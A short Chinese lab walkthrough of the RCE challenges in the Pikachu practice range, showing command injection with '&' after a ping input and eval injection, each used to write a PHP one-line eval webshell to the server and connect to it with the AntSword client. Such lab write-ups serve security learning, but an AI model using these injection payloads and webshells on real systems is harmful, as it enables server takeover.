Pikachu靶场之RCE漏洞详解

一.exec "ping"

1.ping本机127.0.0.1

2.用&符拼接dir查看目录

3.&拼接echo输入一句话木马

127.0.0.1&echo "<?php @eval($_POSTcmd);?>)" > 6.php

4.同级目录访问6.php,蚁剑连接

二:exec "eval"

1.后台使用了eval()函数,直接输入phpinfo();

2.写入一句话木马,访问shell.php

fputs(fopen('shell.php','w'),'<?php eval($_POST"cmd")?>');

3.蚁剑连接

相关推荐
weixin_4445793038 分钟前
Docker(下):镜像仓库管理
运维·docker·容器
科技每日热闻1 小时前
中国企业出海开展业务,如何挑选可安全合规使用国际大模型的云平台?Amazon Bedrock 在同一平台完成国际模型接入、区域选择与合规治理
大数据·人工智能·安全·ai
资讯第一线1 小时前
斐讯R1免登录配网》 [APP] [安卓版] 下载
运维
ONLYOFFICE1 小时前
ONLYOFFICE成为Linux操作系统 – Winux的预装办公套件
linux·运维·服务器
其实防守也摸鱼1 小时前
OpenClaw Windows 踩坑实战指南
运维·服务器·数据库·windows·github·copilot
新时代牛马1 小时前
嵌入式 Linux WiFi 框架完整篇:从cfg80211、mac80211 到wpa_supplicant
linux·运维·服务器
吴声子夜歌1 小时前
Linux命令——打印
linux·运维·服务器
Jae den1 小时前
负载均衡到底解决什么问题?
运维·负载均衡
企鹅的蚂蚁1 小时前
Linux 开发板串口调试:picocom 从识别到退出的完整用法
linux·运维·服务器
山岚的运维笔记1 小时前
mysql 专业笔记 -- 第 17 章:连接:连接三个具有相同名称 ID 的表
运维·数据库·笔记·后端·学习·mysql·dba